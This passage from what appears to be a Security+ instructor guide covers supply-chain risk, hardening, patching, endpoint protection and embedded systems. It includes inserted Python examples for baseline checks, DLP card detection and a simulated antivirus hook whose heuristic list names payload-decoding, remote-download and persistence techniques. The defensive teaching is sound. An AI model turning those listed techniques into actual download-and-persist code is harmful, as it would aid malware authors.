Not all attacks have to be so esoteric. USB sticks infected with ordinary malware are still incredibly prolific infection vectors. Hosts should always be configured to prevent autorun when USB devices are attached. USB ports can be blocked altogether using most types of Host Intrusion Detection Systems (HIDS).

Show Slide(s): Third-Party Risk Management

Teaching Tip: Note that there are two main scenarios for evaluating this risk. Most businesses will just focus on using reputable suppliers and being extremely careful about the use of second-hand equipment. Military and secret service-type organizations may perform their own audits of suppliers. Remind students about the controversy over Huawei's smartphones and network infrastructure appliances (pcworld.com/article/cia-fbi-nsa-officials-avoid-huawei-phones.html).

Third-Party Risk Management

A root of trust is only trustworthy if the vendor has implemented it properly. Hardware and firmware vulnerabilities and exploits demonstrate the necessity of third-party risk management. A supply chain is the end-to-end process of supplying, manufacturing, distributing, and finally releasing goods and services to a customer. For example, for a TPM to be trustworthy, the supply chain of chip manufacturers, firmware authors, OEM resellers, and administrative staff responsible for provisioning the computing device to the end user must all be trustworthy. Anyone with the time and resources to modify the computer's firmware could in theory create some sort of backdoor access. The same is true for any kind of computer or network hardware, right down to cables.

Establishing a trusted supply chain for computer equipment essentially means denying malicious actors the time or resources to modify the assets being supplied.

For most businesses, use of reputable OEMs will represent the best practical effort at securing the supply chain. Government, military/security services, and large enterprises will exercise greater scrutiny. Particular care should be taken if use is made of second-hand machines.

When assessing suppliers for risk, it is helpful to distinguish two types of relationship:

• Vendor: this means a supplier of commodity goods and services, possibly with some level of customization and direct support.

• Business partner: this implies a closer relationship where two companies share quite closely aligned goals and marketing opportunities.

For example, Microsoft is a major software vendor, but it is not feasible for it to establish direct relationships with all its potential customers. To expand its markets, it develops partner relationships with original equipment manufacturers (OEMs) and solution providers. Microsoft operates a program of certification and training for its partners, which improves product support and security awareness.

Show Slide(s): End of Life Systems

Teaching Tip: Make sure students can contrast the support available when a product is EOL with EOSL.

End of Life Systems

When a manufacturer discontinues sales of a product, it enters an end of life (EOL) phase in which support and availability of spares and updates become more limited. An end of service life (EOSL) system is one that is no longer supported by its developer or vendor. EOSL products no longer receive security updates and so represent a critical vulnerability if any remain in active use.

For example, in Microsoft's support lifecycle policy, Windows versions are given five years of mainstream support and five years of extended support (during which only security updates are shipped). You can check the support status for a particular version of Windows at support.microsoft.com/en-us/help/windows-lifecycle-fact-sheet. Most OS and application vendors have similar policies. Care also needs to be taken with open source software. If the software is well maintained, the development group will identify versions that have Long Term Support (LTS). Other builds and version branches might not receive updates.

It is also possible for both open source and commercial projects to be abandoned (if a company continues to rely on such abandonware, it will have to assume development responsibility for it). There are many instances of applications and devices (peripheral devices especially) that remain on sale with serious known vulnerabilities in firmware or drivers and no prospect of vendor support for a fix. The problem is also noticeable in consumer-grade networking appliances and in the Internet of Things. When provisioning a supplier for applications and devices, it is vital to establish that they have effective security management lifecycles for their products.

Show Slide(s): Organizational Security Agreements

Teaching Tip: We don't try to go into any detail here; just make sure students know the basic purpose of each agreement type.

Organizational Security Agreements

It is important to remember that although one can outsource virtually any service or activity to a third party, one cannot outsource legal accountability for these services or actions. You are ultimately responsible for the services and actions that these third parties take. If they have any access to your data or systems, any security breach in their organization (for example, unauthorized data sharing) is effectively a breach in yours. Issues of security risk awareness, shared duties, and contractual responsibilities can be set out in a formal legal agreement. The following types of agreements are common:

• Memorandum of understanding (MOU): A preliminary or exploratory agreement to express an intent to work together. MOUs are usually intended to be relatively informal and not to act as binding contracts. MOUs almost always have clauses stating that the parties shall respect confidentiality, however.

• Business partnership agreement (BPA): While there are many ways of establishing business partnerships, the most common model in IT is the partner agreements that large IT companies such as Microsoft and Cisco set up with resellers and solution providers.

• Non-disclosure agreement (NDA): Legal basis for protecting information assets. NDAs are used between companies and employees, between companies and contractors, and between two companies. If the employee or contractor breaks this agreement and does share such information, they may face legal consequences. NDAs are useful because they deter employees and contractors from violating the trust that an employer places in them.

• Service level agreement (SLA): A contractual agreement setting out the detailed terms under which a service is provided.

• Measurement systems analysis (MSA): Quality management processes, such as Six Sigma, make use of quantified analysis methods to determine the effectiveness of a system. This can be applied to cybersecurity procedures, such as vulnerability and threat detection and response. A measurement systems analysis (MSA) is a means of evaluating the data collection and statistical methods used by a quality management process to ensure they are robust. This might be an onboarding requirement when partnering with enterprise companies or government agencies.

A legal agreement is all very well, but it is still up to you to make sure that your suppliers, vendors, and contractors can live up to it. If they can't, you may successfully sue them, but if they go out of business, you are still accountable for their actions or failures to act.

Conversely, you need to ensure that you can comply with the requirements and performance standards of any agreements that you enter into as a service provider.


Review Activity:
Secure Firmware

Answer the following questions:

1. What use is made of a TPM for NAC attestation?

The Trusted Platform Module (TPM) is a tamper-proof (at least in theory) cryptographic module embedded in the CPU or chipset. This can provide a means to sign the report of the system configuration so that a network access control (NAC) policy enforcer can trust it.

2. Why are OS-enforced file access controls not sufficient in the event of the loss or theft of a computer or mobile device?

The disk (or other storage) could be attached to a foreign system and the administrator could take ownership of the files. File-level, full disk encryption (FDE), or self-encrypting drives (SED) mitigate this by requiring the presence of the user's decryption key to read the data.

3. What use is a TPM when implementing full disk encryption?

A trusted platform module provides a secure mechanism for creating and storing the key used to encrypt the data. Access to the key is provided by configuring a password. The alternative is usually to store the private key on a USB stick.

4. What countermeasures can you use against the threat of malicious firmware code?

Only use reputable suppliers for peripheral devices and strictly controlled sources for firmware updates. Consider use of a sheep dip sandboxed system to observe a device before allowing it to be attached to a host in the enterprise network. Use execution control software to allow only approved vendors.

5. What type of interoperability agreement would be appropriate at the outset of two companies agreeing to work with one another?

A memorandum of understanding (MOU).

6. What type of interoperability agreement is designed to ensure specific performance standards?

A service level agreement (SLA). In addition, performance standards may also be incorporated in business partner agreements (BPAs).


Topic 12B
Implement Endpoint Security

EXAM OBJECTIVES COVERED

3.2 Given a scenario, implement host or application security solutions

Teaching Tip: This topic is straightforward and builds upon principles that are well established by A+, so you should be able to complete it quickly.

Host hardware integrity is not of much use if the OS and applications software running on it is weakly configured. As a security professional, you will often assist with drafting configuration baselines, ensuring hosts comply with those baselines, and implementing endpoint protection security agents.

Show Slide(s): Hardening

Hardening

The process of putting an operating system or application in a secure configuration is called hardening. When hardening a system, it is important to keep in mind its intended use, because hardening a system can also restrict the system's access and capabilities. The need for hardening must be balanced against the access requirements and usability in a particular situation.

For an OS functioning in a given role, there will usually be a fairly standard series of steps to follow to apply a secure configuration to allow the OS and applications software to execute that role. Many of the requirements can be applied automatically via a configuration baseline template. The essential principle is of least functionality: that a system should run only the protocols and services required by legitimate users and no more. This reduces the potential attack surface.

• Interfaces provide a connection to the network. Some machines may have more than one interface. For example, there may be wired and wireless interfaces or a modem interface. Some machines may come with a management network interface card. If any of these interfaces are not required, they should be explicitly disabled rather than simply left unused.

• Services provide a library of functions for different types of applications. Some services support local features of the OS and installed applications. Other services support remote connections from clients to server applications. Unused services should be disabled.

• Application service ports allow client software to connect to applications over a network. These should either be disabled or blocked at a firewall if remote access is not required. Be aware that a server might be configured with a non-standard port. For example, an HTTP server might be configured to listen on a port other than its default. Conversely, malware may try to send non-standard data over an open port. An intrusion detection system should detect if network data does not correspond to the expected protocol format.

• Persistent storage holds user data generated by applications, plus cached credentials. Disk encryption is essential to data security. Self-encrypting drives can be used so that all data at rest is always stored securely.

Lesson 12: Implementing Host Security Solutions | Topic 12B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
326 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

It is also important to establish a maintenance cycle for each device and keep up to date with new security threats and responses for the particular software products that you are running.

Show Slide(s): Baseline Configuration and Registry Settings

Teaching Tip: Note that Linux stores all configuration settings in text files. These can be scanned for baseline compliance (access.redhat.com/documentation/en-us/red_hat_enterprise_linux/html/security_guide/configuration-compliance-scanning, "Scanning the system for configuration compliance and vulnerabilities").

Baseline Configuration and Registry Settings

You will have separate configuration baselines for desktop clients, file and print servers, Domain Name System (DNS) servers, application servers, directory services servers, and other types of systems. In Windows, configuration settings are stored in the registry. On a Windows domain network, each domain-joined computer will receive policy settings from one or more group policy objects (GPOs). These policy settings are applied to the registry each time a computer boots. Where hosts are centrally managed and running only authorized apps and services, there should be relatively little reason for security-relevant registry values to change. Rights to modify the registry should only be issued to user and service accounts on a least privilege basis. A host-based intrusion detection system can be configured to alert on suspicious registry events.

Baseline deviation reporting means testing the actual configuration of hosts to ensure that their configuration settings match the baseline template. On Windows networks, the Microsoft Baseline Security Analyzer (MBSA) tool was popularly used to validate the security configuration. MBSA and other Microsoft reporting tools have now been replaced by the Security Compliance Toolkit (docs.microsoft.com/en-us/windows/security/threat-protection/security-compliance-toolkit).

Using Security Compliance Manager to compare settings in a production GPO with Microsoft's template policy settings. (Screenshot used with permission from Microsoft.)
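An added example (not the guide's code, nor that of any Microsoft tool) of baseline deviation reporting as described above: constructed per-host settings are checked against a constructed baseline template, each host's deviations (including settings the policy never reached) are listed, and deviations are counted per setting across the fleet. The setting names, rules and hosts are assumptions, not real registry paths.

```python
"""Baseline deviation reporting, simulated.

Added example (not the guide's or Microsoft's code): checks constructed host
settings against a constructed baseline template and reports each host's
deviations, then counts deviations per setting across the fleet. Setting names
are illustrative labels, not real registry paths."""
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    setting: str
    expected: object
    op: str = "eq"          # "eq": must equal; "ge": at least; "le": at most
    severity: str = "high"


# Constructed baseline template of the kind a GPO would enforce.
BASELINE = [
    Rule("autorun_disabled", 1),
    Rule("smb1_enabled", 0),
    Rule("host_firewall_enabled", 1),
    Rule("registry_tools_restricted", 1, severity="medium"),
    Rule("min_password_length", 14, "ge", "medium"),
    Rule("screen_lock_timeout_sec", 900, "le", "low"),
]

# Constructed scan results: host name -> settings read from the host.
SCAN_RESULTS = {
    "ws01": {"autorun_disabled": 1, "smb1_enabled": 0, "host_firewall_enabled": 1,
             "registry_tools_restricted": 1, "min_password_length": 14,
             "screen_lock_timeout_sec": 600},
    "ws02": {"autorun_disabled": 0, "smb1_enabled": 0, "host_firewall_enabled": 1,
             "registry_tools_restricted": 1, "min_password_length": 8,
             "screen_lock_timeout_sec": 600},
    "srv01": {"autorun_disabled": 1, "smb1_enabled": 1,
              "registry_tools_restricted": 1, "min_password_length": 14,
              "screen_lock_timeout_sec": 900},   # host_firewall_enabled absent
}


def satisfies(rule: Rule, actual) -> bool:
    """Evaluate one rule against the value read from the host."""
    if rule.op == "eq":
        return actual == rule.expected
    if rule.op == "ge":
        return actual >= rule.expected
    if rule.op == "le":
        return actual <= rule.expected
    raise ValueError(f"unknown operator {rule.op!r}")


def report_host(host: str, settings: dict, baseline=BASELINE) -> dict:
    """Compare one host with the baseline. A setting that is absent is a
    deviation too: the policy evidently never reached this host."""
    deviations = []
    for rule in baseline:
        if rule.setting not in settings:
            deviations.append((rule.setting, rule.severity, rule.expected, "MISSING"))
        elif not satisfies(rule, settings[rule.setting]):
            deviations.append((rule.setting, rule.severity, rule.expected,
                               settings[rule.setting]))
    return {"host": host, "compliant": not deviations, "deviations": deviations}


def fleet_report(scan_results: dict, baseline=BASELINE) -> dict:
    """Report for every scanned host."""
    return {h: report_host(h, s, baseline) for h, s in scan_results.items()}


def deviation_counts(reports: dict) -> Counter:
    """How many hosts deviate on each setting. A setting wrong on most hosts
    points at the template or GPO; one wrong on a single host is drift on
    that host and worth a closer look."""
    return Counter(d[0] for r in reports.values() for d in r["deviations"])


if __name__ == "__main__":
    reports = fleet_report(SCAN_RESULTS)
    for host, rep in reports.items():
        status = "COMPLIANT" if rep["compliant"] else "DEVIATES"
        print(f"{host}: {status}")
        for setting, severity, expected, actual in rep["deviations"]:
            print(f"  [{severity}] {setting}: expected {expected}, found {actual}")
    print("per-setting counts:", dict(deviation_counts(reports)))
```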

Show Slide(s): Patch Management

Teaching Tip: Unpatched client applications and web application servers (corrupting trusted websites through the site owner's lax security) remain one of the biggest security issues at the current time (Equifax, for instance: theregister.com/missed_patch_caused_equifax_data_breach). Recent years have seen leaks of tools developed by the CIA and other intelligence agencies to exploit vulnerabilities in Windows and mobile OS. This means that systems that are not completely up to date with patches are extremely high risk.

Patch Management

No operating system, software application, or firmware implementation is wholly free from vulnerabilities. As soon as a vulnerability is identified, vendors will try to correct it. At the same time, attackers will try to exploit it. Automated vulnerability scanners can be effective at discovering missing patches for the operating system, plus a wide range of third-party software apps and devices firmware. Scanning is only useful if effective procedures are in place to apply the missing patches, however.

On residential and small networks, hosts will be configured to auto-update, meaning that they check for and install patches automatically. The major OS and applications software products are well supported in terms of vendor-supplied fixes for security issues. Enterprise networks need to be cautious about this sort of automated deployment, however, as a patch that is incompatible with an application or workflow can cause availability issues. There can also be performance and management issues when multiple applications run update clients on the same host. For example, as well as the OS updater, there is likely to be a security software update, browser updater, Java updater, OEM driver updater, and so on. These issues can be mitigated by deploying an enterprise patch management suite. Some suites, such as Microsoft's System Center Configuration Manager (SCCM)/Endpoint Manager (docs.microsoft.com/en-us/mem/configmgr), are vendor-specific while others are designed to support third-party applications and multiple OSes.

It can also be difficult to schedule patch operations, especially if applying the patch is an availability risk to a critical system. If vulnerability assessments are continually highlighting issues with missing patches, patch management procedures should be upgraded. If the problem affects certain hosts only, it could be an indicator of compromise that should be investigated more closely.

Patch management can also be difficult for legacy systems, proprietary systems, and systems from vendors without robust security management plans, such as some types of Internet of Things devices. These systems will need compensating controls, or some other form of risk mitigation if patches are not readily available.

Show Slide(s): Endpoint Protection

Teaching Tip: Students should hopefully be comfortable with the features and operation of A-V scanners, so focus on advanced malware detection techniques. Note that we'll cover DLP in more detail later in the course.

Interaction Opportunity: Optionally, get the students to research features of EPPs on different vendor sites.

Endpoint Protection

Another crucial step in hardening is to configure endpoint protection for automatic detection and prevention of malware threats. There have been many iterations of host-based endpoint protection suites and agents. It is important to consider the contrasting functions performed, as individual software tools or protection suites often combine multiple functionality.

Antivirus (A-V)/Anti-Malware

The first generation of anti-virus (A-V) software is characterized by signature-based detection and prevention of known viruses. An A-V product will now perform generalized malware detection, meaning not just viruses and worms, but also Trojans, spyware, PUPs, crypto-jackers, and so on. While A-V software remains important, signature-based detection is widely recognized as being insufficient for the prevention of data breaches.

Host-Based Intrusion Detection/Prevention (HIDS/HIPS)

Host-based intrusion detection systems (HIDS) provide threat detection via log and file system monitoring. HIDS come in many different forms with different capabilities, some of them preventative (HIPS). File system integrity monitoring uses signatures to detect whether a managed file image (such as an OS system file, driver, or application executable) has changed. Products may also monitor ports and network interfaces, and process data and logs generated by specific applications, such as HTTP or FTP.

Endpoint Protection Platform (EPP)

Endpoint protection usually depends on an agent running on the local host. If multiple security products install multiple agents (say one for A-V, one for HIDS, another for host-based firewall, and so on), they can impact system performance and cause conflicts, creating numerous technical support incidents and security incident false positives. An endpoint protection platform is a single agent performing multiple security tasks, including malware/intrusion detection and prevention, but also other security features, such as a host firewall, web content filtering/secure search and browsing, and file/message encryption.

Data Loss Prevention (DLP)

Many EPPs include a data loss prevention (DLP) agent. This is configured with policies to identify privileged files and strings that should be kept private or confidential, such as credit card numbers. The agent enforces the policy to prevent data from being copied or attached to a message without authorization.
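An added example (not code from the CompTIA guide or any vendor's agent) of the kind of DLP content check the paragraph describes: candidate card numbers in an outbound message are confirmed with the Luhn checksum (so ordinary 16-digit ticket or order numbers are not flagged), masked for the incident record, and then blocked or audited according to a constructed policy. The sample messages, the policy and the function names are assumptions.

```python
"""DLP content inspection for card numbers, simulated.

Added example (not code from the CompTIA guide or any vendor agent): finds
candidate payment card numbers in outbound text, confirms them with the Luhn
check so ordinary 16-digit order or ticket numbers are not flagged, and applies
a constructed policy. The messages and the policy are constructed samples."""
import re

# 13 to 19 digits, optionally separated by single spaces or hyphens, and not
# embedded in a longer run of digits.
CANDIDATE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")


def luhn_valid(digits: str) -> bool:
    """Luhn checksum used by payment card numbers: from the right, double every
    second digit (subtracting 9 if that exceeds 9); the sum must be a multiple
    of 10."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def find_card_numbers(text: str) -> list:
    """Return the digit strings in text that look like card numbers and pass
    the Luhn check."""
    found = []
    for match in CANDIDATE.finditer(text):
        digits = re.sub(r"[ -]", "", match.group())
        if luhn_valid(digits):
            found.append(digits)
    return found


def mask(digits: str) -> str:
    """Keep only the last four digits, as a DLP incident record would."""
    return "*" * (len(digits) - 4) + digits[-4:]


def enforce_policy(message: str, external_recipient: bool, sender_authorized: bool = False):
    """Constructed policy: card numbers may not leave the organization unless
    the sender is in an authorized group; internal sends are allowed but
    logged. Returns (action, masked_numbers)."""
    cards = find_card_numbers(message)
    if not cards:
        return "allow", []
    masked = [mask(c) for c in cards]
    if external_recipient and not sender_authorized:
        return "block", masked
    return "allow-audited", masked


if __name__ == "__main__":
    # Constructed sample messages; the card numbers are widely published test numbers.
    samples = [
        ("Please charge 4111 1111 1111 1111 for the invoice", True),
        ("Ticket 1234567890123456 is still open", True),
        ("Refund to 5500-0000-0000-0004 approved", False),
    ]
    for text, external in samples:
        print(enforce_policy(text, external_recipient=external))
```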

Endpoint Protection Deployment

While specific products vary widely in terms of features and implementation detail, some generic tasks to implement endpoint protection include:

1. Configure the management system to push the agent software and any updates to all desktops. This will require configuring permissions and firewall settings.

2. Assign hosts to appropriate groups for policy assignment. For example, client endpoints have very different security requirements to servers. While it may be appropriate to use a preventative mechanism immediately to isolate a client when a threat is detected, automatically doing this for a critical server could cascade to loss of functionality across the network.

3. Test the different host group configuration settings to ensure that the expected range of threats is detected.

4. Use a monitoring dashboard to verify status across all network hosts. Apart from detection events, if the agent is disabled or missing, there should be an alert.

Show Slide(s): Next-Generation Endpoint Protection

Teaching Tip: Note these platforms are distinguished by the use of AI/machine learning analytics.

Next-Generation Endpoint Protection

Where EPP provides mostly signature-based detection and prevention, next-generation endpoint protection with automated response is focused on logging of endpoint observables and indicators combined with behavioral- and anomaly-based analysis.

Endpoint Detection and Response (EDR)

An endpoint detection and response (EDR) product's aim is not to prevent initial execution, but to provide real-time and historical visibility into the compromise, contain the malware within a single host, and facilitate remediation of the host to its original state. The term EDR was coined by Gartner security researcher Anton Chuvakin, and Gartner produces annual Magic Quadrant reports for both EPP (gartner.com/en/documents) and EDR functionality within security suites (gartner.com/en/documents/market-guide-for-endpoint-detection-and-response-solutio).

Where earlier endpoint protection suites report to an on-premises management server, next-generation endpoint agents are more likely to be managed from a cloud portal and use artificial intelligence (AI) and machine learning to perform user and entity behavior analysis. These analysis resources would be part of the security service provider's offering.

Note that managed detection and response (MDR) is a class of hosted security service (digitalguardian.com/blog/what-managed-detection-and-response-definition-benefits-how-choose-vendor-and-more).

Lesson 12: Implementing Host Security Solutions | Topic 12B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 329

Next-Generation Firewall Integration

An analytics-driven next-gen antivirus product is likely to combine with the perimeter
and zonal security offered by next-gen firewalls. For example, detecting a threat on an
endpoint could automate a firewall policy to block the covert channel at the perimeter,
isolate the endpoint, and mitigate risks of the malware using lateral movement
between hosts. This type of functionality is set out in more detail in Sophos's white
paper on synchronized security (sophos.com/en-us/lp/synchronized-security.aspx).

Antivirus Response

Show Slide(s): Antivirus Response

An on-access anti-virus scanner or intrusion prevention system works by identifying
when processes or scripts are executed and intercepting (or hooking) the call to scan
the code first. If the code matches a signature of known malware or exhibits malware-
like behavior that matches a heuristic profile, the scanner will prevent execution and
attempt to take the configured action on the host file (clean, quarantine, erase, and so
on). An alert will be displayed to the user and the action will be logged (and also may
generate an administrative alert). The malware will normally be tagged using a vendor
proprietary string and possibly by a CME (Common Malware Enumeration) identifier.
These identifiers can be used to research the symptoms of and methods used by
the malware. This may help to confirm the system is fully remediated and to identify
whether other systems have been infected. It is also important to trace the source of
the infection and ensure that it is blocked to prevent repeat attacks and outbreaks.
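An added example, not from the course or any vendor, that sketches the hook-and-scan flow described above in Python: a signature lookup on the file hash, a fallback heuristic profile, the configured action, and the vendor tag string that the user alert and log carry. The signature database, heuristic indicator strings, tag names and sample file contents are all constructed for illustration.

```python
import hashlib
import logging
from dataclasses import dataclass
from typing import Optional

log = logging.getLogger("on_access_scan")

# Constructed signature database: SHA-256 of known-bad content -> vendor tag.
# A real product ships millions of entries; this tag string is invented.
SIGNATURES = {
    hashlib.sha256(b"EICAR-LIKE-TEST-SAMPLE").hexdigest(): "Trojan.Generic.ExampleTag",
}

# Constructed heuristic profile: behaviours that, in combination, mark a script
# as malware-like even when no signature matches.
HEURISTIC_INDICATORS = {
    "decodes_payload": ("frombase64string", "base64 -d", "b64decode"),
    "downloads": ("downloadstring(", "invoke-webrequest", "urllib.request"),
    "persists": ("\\currentversion\\run", "crontab", "schtasks"),
}
HEURISTIC_THRESHOLD = 2   # this many distinct behaviours trips the heuristic


@dataclass
class ScanResult:
    allowed: bool
    tag: Optional[str] = None      # vendor string used to research the sample
    action: Optional[str] = None   # "clean" | "quarantine" | "erase"
    admin_alert: bool = False


def heuristic_hits(content: bytes) -> list:
    """Names of the heuristic behaviours present in the (decoded) content."""
    text = content.decode("utf-8", errors="ignore").lower()
    return [name for name, needles in HEURISTIC_INDICATORS.items()
            if any(n in text for n in needles)]


def on_execute(path: str, content: bytes, configured_action: str = "quarantine") -> ScanResult:
    """Hook point: called before a process or script is allowed to run.

    Returns whether execution may proceed, and if not, the tag and the action
    applied to the host file so the event can be logged and alerted.
    """
    tag = SIGNATURES.get(hashlib.sha256(content).hexdigest())
    if tag is None:
        hits = heuristic_hits(content)
        if len(hits) >= HEURISTIC_THRESHOLD:
            tag = "Heur.Suspicious." + ".".join(sorted(hits))
    if tag is None:
        return ScanResult(allowed=True)
    # Logged locally and surfaced to the administrator, as described above.
    log.warning("blocked %s tag=%s action=%s", path, tag, configured_action)
    return ScanResult(allowed=False, tag=tag, action=configured_action, admin_alert=True)
```
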

Advanced Malware Tools

Malware is often able to evade detection by automated scanners. Analysis of SIEM and
intrusion detection logs might reveal suspicious network connections, or a user may
observe unexplained activity or behavior on a host. When you identify symptoms such
as these, but the A-V scanner or agent does not report an infection, you will need to
analyze the host for malware using advanced tools.
There is a plethora of advanced analysis and detection utilities, but the starting point
for most technicians is Sysinternals (docs.microsoft.com/en-us/sysinternals).

Sandboxing

Sandboxing is a technique that isolates an untrusted host or app in a segregated
environment to conduct tests. Sandbox environments intentionally limit interfaces with
the host environment. The analysis of files sent to a sandbox can include determining
whether the file is malicious, how it might have affected certain systems if run outside
of the sandbox, and what dependencies it might have with external files and hosts.
Sandboxes offer more than traditional anti-malware solutions because you can apply
a variety of different environments to the sandbox instead of just relying on how the
malware might exist in your current configuration.


Review Activity:
Endpoint Security
Answer the following questions:

1. What is a hardened configuration?

A basic principle of security is to run only services that are needed. A hardened
system is configured to perform a role as client or application server with the minimal
possible attack surface, in terms of interfaces, ports, services, storage, system/registry
permissions, lack of security controls, and vulnerabilities.

2. True or false? Only Microsoft's operating systems and applications require
security patches.

False. Any vendor's or open source software or firmware can contain vulnerabilities
that need patching.

3. Anti-virus software has reported the presence of malware but cannot
remove it automatically. Apart from the location of the affected file, what
information will you need to remediate the system manually?

The string identifying the malware. You can use this to reference the malware on the
A-V vendor's site and, hopefully, obtain manual removal and prevention advice.

4. You are consulting with a medium-size company about endpoint security
solutions. What advantages does a cloud-based analytics platform have
over an on-premises solution that relies on signature updates?

Advanced persistent threat (APT) malware can use many techniques to evade
signature-based detection. A cloud analytics platform, backed by machine learning, can
apply more effective behavioral-based monitoring and alerting.

5. If you suspect a process of being used for data exfiltration but the process is
not identified as malware by A-V software, what types of analysis tools will
be most useful?

You can use a sandbox with monitoring tools to see which files the process interacts
with and a network monitor to see if it opens or tries to open a connection with a
remote host.


Topic 12C
Explain Embedded System
Security Implications

EXAM OBJECTIVES COVERED
2.6 Explain the security implications of embedded and specialized systems

Teaching Tip: This lesson on host security concludes with a look at embedded systems.
The risks from these systems are increasingly well known and documented, so this is
an important topic to cover.

As well as the obvious computing hosts within your networks, you must also account
for the security of embedded systems. Embedded computing functionality can be
found in consumer electronics devices and in specialist monitoring and control
systems, so it is important that you know how to identify and secure these devices.

Embedded Systems

Show Slide(s): Embedded Systems
Teaching Tip: Distinguish embedded systems from general-purpose PC hosts in terms
of single-purpose functions and resource constraints.

An embedded system is a complete computer system that is designed to perform a
specific, dedicated function. These systems can be as contained as a microcontroller
in an intravenous drip rate meter or as large and complex as the network of control
devices managing a water treatment plant. Embedded systems can be characterized
as static environments. A PC is a dynamic environment. The user can add or remove
programs and data files, install new hardware components, and upgrade the operating
system. A static environment does not allow or require such frequent changes.
In terms of security this can be ideal, because unchanging environments are typically
easier to protect and defend. Static computing environments pose their own risks,
however. A static environment is often a black box to security administrators. Unlike
an environment such as Windows, there may be little support for identifying and
correcting security issues.

Cost, Power, and Compute Constraints

Embedded systems are usually constrained in terms of processor capability (cores and
speed), system memory, and persistent storage. Cost is an important factor. As devices
may be used in large numbers and are designed for fairly predictable processing
workloads, there is no obvious reason to over-provision compute resources and the
price per unit can be driven as low as possible.
The other factor determining compute resources is power. Many embedded devices
are battery-powered, and may need to run for years without having to replace the cells.
This means that processing must be kept to the minimum possible level.

Crypto, Authentication, and Implied Trust Constraints

The lack of compute resources means that embedded systems are not well matched
to the cryptographic identification and authentication technologies that are widely
used on computer networks. As embedded systems become more accessible via
those networks, however, they need to use cryptoprocessors to ensure confidentiality,
integrity, and availability. This is prompting the development of ciphers that do not
require such large processing resources.
On PC hardware, a root of trust is established at the hardware level by a TPM.
Without this explicit trust anchor, a network has to use an implied trust model.

Lesson 12: Implementing Host Security Solutions | Topic 12C

Implied trust means that every device that has been added to the network is trusted,
on the assumption that it was added and continues to be operated by a legitimate
administrator. Until there is widespread adoption of embedded TPM, embedded
networks have to rely on the perimeter security model.

Network and Range Constraints

Minimizing compute functions also has an impact on choices for network connectivity.
The Wi-Fi and 4G standards developed for use with computer and smartphone
networking use power-hungry antennas to maximize data rates and range, plus
processing to encrypt the communications. Networks for embedded systems
emphasize power-efficient transfer of small amounts of data with a high degree of
reliability and low latency.

Logic Controllers for Embedded Systems

Show Slide(s): Logic Controllers for Embedded Systems
Teaching Tip: Explain the way that embedded systems are the same as, but different
from, PCs. The functions for CPU, memory, storage, and networking are still there, but
the requirements are different (availability, predictability, and cost are prioritized over
flexibility).

Embedded systems are normally based on firmware running on a programmable
logic controller (PLC). These PLCs are built from different hardware and
components than some desktop PCs.

System on Chip (SoC)

Desktop computer system architecture uses a generalized CPU plus various other
processors and controllers and system memory, linked via the motherboard. System
on chip (SoC) is a design where all these processors, controllers, and devices are
provided on a single processor die (or chip). This type of packaging saves space and is
usually power efficient, and so is very commonly used with embedded systems.
Raspberry Pi (raspberrypi.org) and Arduino (arduino.cc) are examples of SoC boards,
initially devised as educational tools, but now widely used for industrial applications,
and hacking.

Field Programmable Gate Array (FPGA)

A microcontroller is a processing unit that can perform sequential operations from
a dedicated instruction set. The instruction set is determined by the vendor at the
time of manufacture. Software running on the microcontroller has to be converted
to these instructions (assembly language). As many embedded systems perform
relatively simple but repetitive operations, it can be more efficient to design the
hardware controller to perform only the instructions needed. One example of this
is the application-specific integrated circuits (ASICs) used in Ethernet switches. ASICs
are expensive to design, however, and work only for a single application, such as
Ethernet switching.
A field programmable gate array (FPGA) is a type of controller that solves this
problem. The structure of the controller is not fully set at the time of manufacture.
The end customer can configure the programming logic of the device to run a
specific application.

Real-Time Operating Systems (RTOS)

Many embedded systems operate devices that perform acutely time-sensitive tasks,
such as drip meters or flow valves. The kernels or operating systems that run these
devices must be much more stable and reliable than the OS that runs a desktop
computer or server. Embedded systems typically cannot tolerate reboots or crashes
and must have response times that are predictable to within microsecond tolerances.
Consequently, these systems often use differently engineered platforms called real-
time operating systems (RTOS). An RTOS should be designed to have as small an
attack surface as possible. An RTOS is still susceptible to CVEs and exploits, however.


Embedded Systems Communications Considerations

Show Slide(s): Embedded Systems Communications Considerations
Teaching Tip: Consider mentioning 802.11ah (Wi-Fi HaLow). It uses the ISM band for
better range at lower power.

Historically, embedded systems used proprietary vendor communications
technologies. As technologies improve and closer integration with IT networks
becomes more important, greater use of standardized communication technologies is
becoming more prevalent.

Operational Technology (OT) Networks

A cabled network for industrial applications is referred to as an operational technology
(OT) network. These typically use either serial data protocols or industrial Ethernet.
Industrial Ethernet is optimized for real-time, deterministic transfers. Such networks
might use vendor-developed data link and networking protocols, as well as specialist
application protocols.

Cellular Networks

A cellular network enables long-distance communication over the same system that
supports mobile and smartphones. This is also called baseband radio, after the
baseband processor that performs the function of a cellular modem. There are several
baseband radio technologies:

• Narrowband-IoT (NB-IoT): this refers to a low-power version of the Long Term
Evolution (LTE) or 4G cellular standard. The signal occupies less bandwidth than
regular cellular. This means that data rates are limited (measured in kbps), but most
sensors need to send small packets with low latency, rather than making large data
transfers. Narrowband also has greater penetrating power, making it more suitable
for use in inaccessible locations, such as tunnels or deep within buildings, where
ordinary cellular connectivity would be impossible.

• LTE Machine Type Communication (LTE-M): this is another low-power system, but
supports higher bandwidth (up to about 1 Mbps).

While not yet completely standardized, both NB-IoT and LTE-M are designed to be
compatible with 5G networks. This means they do not interfere with 5G signaling and
can use tower relays developed for 5G. They may support higher data rates, though
latency and reliability tend to be more important considerations.
Any LTE-based cellular radio uses a subscriber identity module (SIM) card as an
identifier. The SIM is issued by a cellular provider, with roaming to allow use of other
suppliers' tower relays. As a removable card is not really a suitable form factor for
embedded, an eSIM incorporates the same function as a chip on the system board or
SoC design.
Encryption of frames between the endpoint and the cell tower and within the backhaul
to Internet routers is the responsibility of the network operator. Over-the-air encryption
is performed by encryption schemes devised by the cellular standards body (3GPP).
Backhaul security is usually enforced using IPSec. The embedded system can use
